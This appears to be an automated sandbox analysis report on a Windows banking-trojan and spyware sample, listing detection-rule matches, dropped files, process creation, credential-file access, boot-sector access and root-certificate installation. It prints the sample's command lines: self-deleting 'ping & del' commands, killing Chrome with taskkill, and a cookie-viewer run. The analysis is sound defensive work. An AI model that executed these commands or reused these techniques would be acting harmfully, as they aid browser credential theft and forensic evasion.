Source: 4.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.2810000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_0045895B
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0043FFF7 lstrcpyW,GetDiskFreeSpaceExW,0_2_0043FFF7
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,11_2_0040CE93
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00431AAB CoCreateInstance,0_2_00431AAB
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00418579 FindResourceW,SizeofResource,LoadResource,LockResource,0_2_00418579
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Login Data1612045889505Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\fnhcdXEfus.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: runfromtemp0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: eprq0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: debuglog0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: reboot0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s%s0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: tempdisk1folder0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: ISSetup.dll0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: ISSetup.dll0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Skin0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Startup0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: setup.isn0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Supported0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Languages0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%s.ini0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%s.ini0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%.04ld.mst0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%.04ld.mst0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: StartUp0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: clone_wait0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp0_2_0043ACD1
Source: fnhcdXEfus.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1612045890161.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: fnhcdXEfus.exeVirustotal: Detection: 73%
Source: fnhcdXEfus.exeMetadefender: Detection: 29%
Source: fnhcdXEfus.exeReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Users\user\Desktop\fnhcdXEfus.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\fnhcdXEfus.exe 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'Jump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2Jump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2Jump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: fnhcdXEfus.exeStatic file information: File size 4453376 > 1048576
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fnhcdXEfus.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeUnpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17,0_2_00440314
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004427DD push ecx; ret 0_2_004427F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10010579 push ecx; ret 0_2_1001058C
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10010579 push ecx; ret 3_2_1001058C
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040E2F1 push ecx; ret 11_2_0040E301
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040E340 push eax; ret 11_2_0040E354
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040E340 push eax; ret 11_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B3FB5 push ecx; ret 30_2_002B3FC8

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D7E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DA70
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d3_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d3_2_1001D7E0
Installs new ROOT certificatesShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6DDB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Roaming\1612045890161.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
